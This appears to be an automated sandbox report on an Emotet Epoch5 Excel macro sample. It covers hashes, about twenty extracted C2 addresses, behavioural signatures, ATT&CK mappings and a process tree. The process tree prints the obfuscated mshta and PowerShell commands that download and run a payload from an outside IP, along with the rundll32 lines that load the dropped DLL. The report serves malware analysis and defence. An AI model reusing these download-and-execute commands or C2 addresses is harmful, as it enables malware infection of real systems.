emotet | bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603

General

Target

bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603.xlsm
Size

115KB
MD5

cb5ae08f0635dff32c684570750108b5
SHA1

33c65f18d7f753d82cb4ac73540d5e53acb61d5f
SHA256

bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603
SHA512

4728bc8629c0584e23d02d4705ce607c6dd76740f4b64b089c8df5dc30f3fd3bec6d6dd4e39ab0bddb4da4fad6bc184496f580232555f74148db38455084f564

Score

10^/10

emotet epoch5 banker persistence suricata trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://0x5cff39c3/sec/se1.html

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://92.255.57.195/sec/se1.png

Extracted

Family

emotet

Botnet

Epoch5

C2

45.138.98.34:80

69.16.218.101:8080

51.210.242.234:8080

185.148.168.220:8080

142.4.219.173:8080

54.38.242.185:443

191.252.103.16:80

104.131.62.48:8080

62.171.178.147:8080

217.182.143.207:443

168.197.250.14:80

37.44.244.177:8080

66.42.57.149:443

210.57.209.142:8080

159.69.237.188:443

116.124.128.206:8080

128.199.192.135:8080

195.154.146.35:443

185.148.168.15:8080

195.77.239.39:8080

eck1.plain

ecs1.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2996	3796	cmd.exe	EXCEL.EXE

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 3568 created 4056 3568 WerFault.exe mshta.exe
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata: ET MALWARE W32/Emotet CnC Beacon 3
suricata
Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exerundll32.exe

flow pid process

38 4056 mshta.exe
56 2700 powershell.exe
58 2700 powershell.exe
62 3680 rundll32.exe
63 3680 rundll32.exe
Downloads MZ/PE file
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation mshta.exe
Loads dropped DLL 4 IoCs

Processes:

rundll32.exerundll32.exerundll32.exerundll32.exe

pid process

3044 rundll32.exe
3316 rundll32.exe
3852 rundll32.exe
3680 rundll32.exe
Drops file in System32 directory 1 IoCs

Processes:

rundll32.exe

description ioc process

File opened for modification C:\Windows\SysWOW64\Epsznxsltf\sbiiwvzsxtanuy.dgv rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3552 4056 WerFault.exe mshta.exe

description	pid	process	target process
PID 3568 created 4056	3568	WerFault.exe	mshta.exe

flow	pid	process
38	4056	mshta.exe
56	2700	powershell.exe
58	2700	powershell.exe
62	3680	rundll32.exe
63	3680	rundll32.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	mshta.exe

pid	process
3044	rundll32.exe
3316	rundll32.exe
3852	rundll32.exe
3680	rundll32.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\Epsznxsltf\sbiiwvzsxtanuy.dgv	rundll32.exe

pid	pid_target	process	target process
3552	4056	WerFault.exe	mshta.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE

Modifies data under HKEY_USERS 41 IoCs

Processes:

WaaSMedicAgent.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3796 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exeWerFault.exerundll32.exe

pid process

2700 powershell.exe
2700 powershell.exe
3552 WerFault.exe
3552 WerFault.exe
3680 rundll32.exe
3680 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2700 powershell.exe

pid	process
2700	powershell.exe
2700	powershell.exe
3552	WerFault.exe
3552	WerFault.exe
3680	rundll32.exe
3680	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	2700	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE
3796	EXCEL.EXE

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

EXCEL.EXEcmd.exeWerFault.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exe

description	pid	process	target process
PID 3796 wrote to memory of 3544	3796	EXCEL.EXE	splwow64.exe
PID 3796 wrote to memory of 3544	3796	EXCEL.EXE	splwow64.exe
PID 3796 wrote to memory of 2996	3796	EXCEL.EXE	cmd.exe
PID 3796 wrote to memory of 2996	3796	EXCEL.EXE	cmd.exe
PID 2996 wrote to memory of 4056	2996	cmd.exe	mshta.exe
PID 2996 wrote to memory of 4056	2996	cmd.exe	mshta.exe
PID 3568 wrote to memory of 4056	3568	WerFault.exe	mshta.exe
PID 3568 wrote to memory of 4056	3568	WerFault.exe	mshta.exe
PID 4056 wrote to memory of 2700	4056	mshta.exe	powershell.exe
PID 4056 wrote to memory of 2700	4056	mshta.exe	powershell.exe
PID 2700 wrote to memory of 1724	2700	powershell.exe	cmd.exe
PID 2700 wrote to memory of 1724	2700	powershell.exe	cmd.exe
PID 1724 wrote to memory of 3044	1724	cmd.exe	rundll32.exe
PID 1724 wrote to memory of 3044	1724	cmd.exe	rundll32.exe
PID 1724 wrote to memory of 3044	1724	cmd.exe	rundll32.exe
PID 3044 wrote to memory of 3316	3044	rundll32.exe	rundll32.exe
PID 3044 wrote to memory of 3316	3044	rundll32.exe	rundll32.exe
PID 3044 wrote to memory of 3316	3044	rundll32.exe	rundll32.exe
PID 3316 wrote to memory of 3852	3316	rundll32.exe	rundll32.exe
PID 3316 wrote to memory of 3852	3316	rundll32.exe	rundll32.exe
PID 3316 wrote to memory of 3852	3316	rundll32.exe	rundll32.exe
PID 3852 wrote to memory of 3680	3852	rundll32.exe	rundll32.exe
PID 3852 wrote to memory of 3680	3852	rundll32.exe	rundll32.exe
PID 3852 wrote to memory of 3680	3852	rundll32.exe	rundll32.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bf154edb1260fa98f30bb6201ed8abd72a55e51938f300f504e164aea6a40603.xlsm"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:3544

C:\Windows\SYSTEM32\cmd.exe
cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2996

C:\Windows\system32\mshta.exe
mshta http://0x5cff39c3/sec/se1.html
3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://92.255.57.195/sec/se1.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
5⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\SysWow64\rundll32.exe
C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3044

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3316

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Epsznxsltf\sbiiwvzsxtanuy.dgv",rMwulOsKeF
8⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3852

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Epsznxsltf\sbiiwvzsxtanuy.dgv",DllRegisterServer
9⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4056 -s 1724
4⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
1⤵
PID:1812

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe a706c6a0f3472b8262c30207f0ace996 mQU6s157AESF7d3PBE+Acg.0.1.0.0.0
1⤵
- Modifies data under HKEY_USERS
PID:1740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow
1⤵
PID:1836

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 420 -p 4056 -ip 4056
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
PID:3568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wusvcs -p
1⤵
PID:3400

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Documents\ssd.dll
MD5
32acc61226f47023b7e70deca529216a

SHA1
5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

SHA256
5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

SHA512
dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

Download Submit
C:\Users\Public\Documents\ssd.dll
MD5
32acc61226f47023b7e70deca529216a

SHA1
5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

SHA256
5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

SHA512
dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

Download Submit
C:\Users\Public\Documents\ssd.dll
MD5
32acc61226f47023b7e70deca529216a

SHA1
5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

SHA256
5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

SHA512
dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

Download Submit
C:\Windows\SysWOW64\Epsznxsltf\sbiiwvzsxtanuy.dgv
MD5
32acc61226f47023b7e70deca529216a

SHA1
5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

SHA256
5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

SHA512
dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

Download Submit
C:\Windows\SysWOW64\Epsznxsltf\sbiiwvzsxtanuy.dgv
MD5
32acc61226f47023b7e70deca529216a

SHA1
5bfe17b62987edcd8cc6e76448f9cbd8fef9d13f

SHA256
5472d14831a29dd4c1584c085266a9bf829ff6d21cb944ee1c719edb8646dec1

SHA512
dbde93cf65bba84cda4c15c976015d27ea09cb9915c1f59dfeb7f87013679bad46f74082a6ad16a8aa04e3f306fd97e7767c8e4ac62b3686697268480698da21

Download Submit
memory/2700-1681-0x000002838D420000-0x00000283A55B0000-memory.dmp

Filesize
385.6MB

Download
memory/2700-1653-0x00000283A5B40000-0x00000283A5B84000-memory.dmp

Filesize
272KB

Download
memory/2700-1589-0x000002838D420000-0x00000283A55B0000-memory.dmp

Filesize
385.6MB

Download
memory/2700-1506-0x000002838D420000-0x00000283A55B0000-memory.dmp

Filesize
385.6MB

Download
memory/2700-1439-0x00000283A5620000-0x00000283A5642000-memory.dmp

Filesize
136KB

Download
memory/2700-1852-0x00000283A5C10000-0x00000283A5C86000-memory.dmp

Filesize
472KB

Download
memory/3044-1805-0x0000000004DD0000-0x0000000004DF8000-memory.dmp

Filesize
160KB

Download
memory/3316-1946-0x0000000005180000-0x00000000051A8000-memory.dmp

Filesize
160KB

Download
memory/3316-1816-0x0000000000ED0000-0x0000000000EF8000-memory.dmp

Filesize
160KB

Download
memory/3316-1856-0x0000000004DB0000-0x0000000004DD8000-memory.dmp

Filesize
160KB

Download
memory/3316-1866-0x0000000004E90000-0x0000000004EB8000-memory.dmp

Filesize
160KB

Download
memory/3316-1884-0x0000000004FA0000-0x0000000004FC8000-memory.dmp

Filesize
160KB

Download
memory/3316-1891-0x0000000005000000-0x0000000005028000-memory.dmp

Filesize
160KB

Download
memory/3680-1955-0x0000000004D40000-0x0000000004D68000-memory.dmp

Filesize
160KB

Download
memory/3680-1951-0x0000000004480000-0x00000000044A8000-memory.dmp

Filesize
160KB

Download
memory/3680-1953-0x00000000049D0000-0x00000000049F8000-memory.dmp

Filesize
160KB

Download
memory/3680-1957-0x0000000004DA0000-0x0000000004DC8000-memory.dmp

Filesize
160KB

Download
memory/3680-1959-0x0000000004E80000-0x0000000004EA8000-memory.dmp

Filesize
160KB

Download
memory/3680-1961-0x0000000004F70000-0x0000000004F98000-memory.dmp

Filesize
160KB

Download
memory/3680-1963-0x0000000005070000-0x0000000005098000-memory.dmp

Filesize
160KB

Download
memory/3680-1965-0x0000000005170000-0x0000000005198000-memory.dmp

Filesize
160KB

Download
memory/3796-134-0x00007FFF2C470000-0x00007FFF2C480000-memory.dmp

Filesize
64KB

Download
memory/3796-135-0x00007FFF2C470000-0x00007FFF2C480000-memory.dmp

Filesize
64KB

Download
memory/3796-133-0x00007FFF2C470000-0x00007FFF2C480000-memory.dmp

Filesize
64KB

Download
memory/3852-1948-0x0000000004CD0000-0x0000000004CF8000-memory.dmp

Filesize
160KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads